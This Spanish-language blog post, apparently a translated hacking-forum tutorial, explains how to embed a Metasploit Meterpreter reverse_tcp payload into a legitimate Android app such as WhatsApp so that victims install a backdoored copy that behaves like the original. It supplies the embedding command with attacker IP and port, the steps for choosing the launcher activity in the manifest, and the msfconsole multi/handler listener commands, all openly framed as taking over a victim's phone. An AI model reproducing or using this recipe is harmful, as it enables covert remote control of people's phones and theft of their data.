AndroidBlog

Incrustar una carga útil de Metasploit en un archivo .Apk original

ACTUALIZACIÓN: Esta publicación está desactualizada, se puede encontrar la última versión con los enlaces correctos e instrucciones actualizadas ACTUALIZACIÓN: Esta publicación está desactualizada, la última versión con los enlaces correctos e instrucciones actualizadas se puede encontrar en mi blog, aquí – en mi blog, aquíhttps://techkernel.org/2015/12/11/embed-metasploit-payload-in-apk-easily/

¡Hola amigos! Soy un miembro nuevo de esta comunidad. Aunque he estado merodeando por aquí por un tiempo, creé una cuenta y me uní recientemente.

He aprendido mucho del creador aquí en NullByte, así que espero convertirme también en un miembro contribuyente, para poder devolver algo. Y es por eso que decidí escribir este artículo compartiendo un guión que descubrí recientemente.

Estoy seguro de que la mayoría de ustedes, o al menos aquellos que han puesto un pie en el reino de la piratería, han oído hablar de Metasploit.

De Wikipedia,

El Proyecto Metasploit es un proyecto de seguridad informática que proporciona información sobre vulnerabilidades de seguridad y ayuda en las pruebas de penetración y el desarrollo de firmas IDS.

Su subproyecto más conocido es el Metasploit Framework de código abierto, una herramienta para desarrollar y ejecutar código de explotación contra una máquina de destino remota. Otros subproyectos importantes incluyen la base de datos Opcode, el archivo shellcode y la investigación relacionada.

En un lenguaje más informal, es una herramienta que podemos usar para realizar varios tipos de hackeos contra una máquina. La carga útil insignia que viene con Metasploit Framework es el ‘Meterpreter’, que también tiene una versión de Android que viene como un archivo .apk. En caso de que se esté preguntando qué es una carga útil, es un programa que podemos instalar en el sistema de una víctima para comprometerlo. Normalmente tenemos que instalar la carga útil en el teléfono de la víctima por cualquier medio que podamos, y cuando la víctima ejecuta la aplicación, obtendríamos una conexión directa al teléfono de nuestra víctima de forma remota y podemos usarla para causar estragos en ese teléfono.

Pero dado que la aplicación no parece muy legítima, ocupa solo unos pocos kB y no muestra nada cuando se hace clic en ella, la víctima probablemente la desinstalará de inmediato o, lo que es peor, no la instalará en absoluto. Entonces tenemos que resolver ese problema.

Aquí es donde entra este tutorial. Le mostraré cómo tomar cualquier archivo .apk, ya sea WhatsApp o Amazon o SnapChat, e incrustar la carga útil de Meterpreter en ese apk. Para la víctima, se verá y se comportará exactamente como la aplicación original, por lo que la usará regularmente sin ninguna duda, permitiéndote hacer lo que quieras con su teléfono.

REQUISITOS PREVIOS:

Para que quede claro, en este tutorial el sistema operativo utilizado es Kali Linux, que es el sistema operativo estándar de facto para las pruebas de penetración (lectura, piratería). También debe instalar la última versión de ‘ApkTool’ y algunas bibliotecas para que los scripts funcionen correctamente.

Para instalar las bibliotecas requeridas, ingrese este comando en la consola:

apt-get install lib32stdc ++ 6 lib32ncurses5 lib32z1

Y para obtener la última versión de ApkTool, diríjase a este sitio y siga las instrucciones de instalación: Enlace

PASO 1:

En primer lugar, obtenga la apk original de cualquiera de los numerosos sitios web disponibles. Simplemente haga una búsqueda en Google “app_name apk download” y Google obtendrá muchos resultados. Guarde ese apk en cualquier carpeta, en este tutorial usaré la carpeta raíz y un WhatApp.apk como ejemplo.

PASO 2:

Descargue el script Ruby desde este enlace y guárdelo en la misma carpeta que la del apk original: Enlace

PASO 3:

Abra una terminal y escriba el siguiente comando:

ruby apk-embed-payload.rb WhatsApp.apk -p android / meterpreter / reverse_tcp LHOST = 192.168.0.104 LPORT = 4895

En este ejemplo, he usado 192.168.0.104 como la dirección IP local, es decir, su dirección IP y 4895 como el puerto en su computadora a través del cual la carga útil de Meterpreter se conectará a usted. Asegúrese de cambiarlo a los valores apropiados, especialmente la IP, el LPORT se puede configurar en cualquier puerto razonable no.

Una vez que ejecute el comando, si tiene suerte, el script hará todo por sí mismo y completará todo el proceso. Pero la mayoría de las veces no puede determinar a qué actividad de la aplicación debe vincular la carga útil, por lo que le pide que la seleccione. En ese caso, deje la terminal con el script en el indicador y busque / root / original.

Luego abra el archivo AndroidManifest.xml usando cualquier editor de texto de su agrado y busque una etiqueta que contenga los textos ‘.MAIN’ y ‘.LAUNCHER’. Cuando encuentre esa etiqueta, busque el atributo ‘android: name’ de esa etiqueta y anote el nombre de esa Actividad.

Cuando se le solicite el script Ruby, ingrese el número correspondiente al nombre de la actividad que anotó anteriormente y presione Enter.

Este es el paso más difícil de todos, así que también voy a publicar algunas capturas de pantalla para hacer tu vida más fácil.

¡¿GANANCIA?!:

Si hizo todo correctamente, ahora debería obtener un archivo apk en su directorio raíz con el nombre ‘backdoored_WhatsApp.apk’. Se instalará y ejecutará como la aplicación original.

En cuanto al oyente, debe usar exploit / multi / handler y configurar las opciones correspondientes en consecuencia. Simplemente ejecute los siguientes comandos.

* msfconsole
usar exploit / multi / handler
establecer PAYLOAD android / meterpreter / reverse_tcp
establecer LHOST 192.168.0.104
establecer LPORT 4895
explotar*

Ahora, cuando la víctima ejecute la aplicación, aparecerá un mensaje de Meterpreter en la terminal.

NOTA:

Debes haber notado que no he explicado nada, más bien te he pedido que me sigas ciegamente. Como ninguno de nosotros quiere ser un niño de guiones, aprenderemos cómo hacer esto manualmente en el próximo artículo. Para ser honesto, no sabía cómo implementar esto con éxito hasta que encontré este script. Después de ver que este script hace lo que promete, aprendí el proceso mediante ingeniería inversa. Dejemos esa historia aparte para otro artículo.

Si tiene algún problema, no olvide mencionarlo en los comentarios. Intentaré ayudarte en todo lo que pueda.

También publiqué esto en mi blog recién creado, así que asegúrese de revisarlo también: Haga clic aquí para ver mi blog

CRÉDITOS:

Encontré el guión de la sección de comentarios de un hilo en NullByte, así que gracias al chico que lo compartió, lo siento, no recuerdo qué hilo era o quién era el chico. Y el mérito de hacer este guión es para timwr y Jack64. Y por último, pero no menos importante, gracias a nuestro administrador OTW y a los demás creadores por guiarnos.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar